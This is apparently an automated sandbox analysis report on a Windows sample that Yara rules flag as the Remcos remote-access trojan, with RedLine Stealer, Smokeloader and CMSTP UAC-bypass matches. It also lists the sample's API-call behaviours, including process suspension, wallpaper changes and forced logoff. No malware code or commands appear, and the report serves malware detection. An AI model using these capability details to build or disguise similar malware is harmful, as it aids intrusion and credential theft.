Source: Yara match	File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409616641.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041C9E2 SystemParametersInfoW,	0_2_0041C9E2
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214CC49 SystemParametersInfoW,	0_2_0214CC49
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041C9E2 SystemParametersInfoW,	15_2_0041C9E2
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074CC49 SystemParametersInfoW,	15_2_0074CC49
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041C9E2 SystemParametersInfoW,	20_2_0041C9E2
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9CC49 SystemParametersInfoW,	20_2_01F9CC49

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.2513143474.0000000000828000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2409581166.0000000000654000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.2463923706.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.4474590588.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	0_2_004132D2
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_0041D58F
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_0041BB09
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	0_2_0041BB35
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214D7F6 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_0214D7F6
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02143539 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	0_2_02143539
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214BD70 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_0214BD70
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214BD9C OpenProcess,NtResumeProcess,CloseHandle,	0_2_0214BD9C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	15_2_004132D2
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	15_2_0041D58F
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	15_2_0041BB09
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	15_2_0041BB35
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00743539 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	15_2_00743539
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074D7F6 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	15_2_0074D7F6
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074BD70 OpenProcess,NtSuspendProcess,CloseHandle,	15_2_0074BD70
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074BD9C OpenProcess,NtResumeProcess,CloseHandle,	15_2_0074BD9C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	20_2_004132D2
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	20_2_0041D58F
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	20_2_0041BB09
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	20_2_0041BB35
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F93539 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	20_2_01F93539
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9D7F6 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	20_2_01F9D7F6
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9BD9C OpenProcess,NtResumeProcess,CloseHandle,	20_2_01F9BD9C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9BD70 OpenProcess,NtSuspendProcess,CloseHandle,	20_2_01F9BD70

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	0_2_004167B4
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02146A20 ExitWindowsEx,LoadLibraryA,GetProcAddress,	0_2_02146A20
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	15_2_004167B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00746A20 ExitWindowsEx,LoadLibraryA,GetProcAddress,	15_2_00746A20
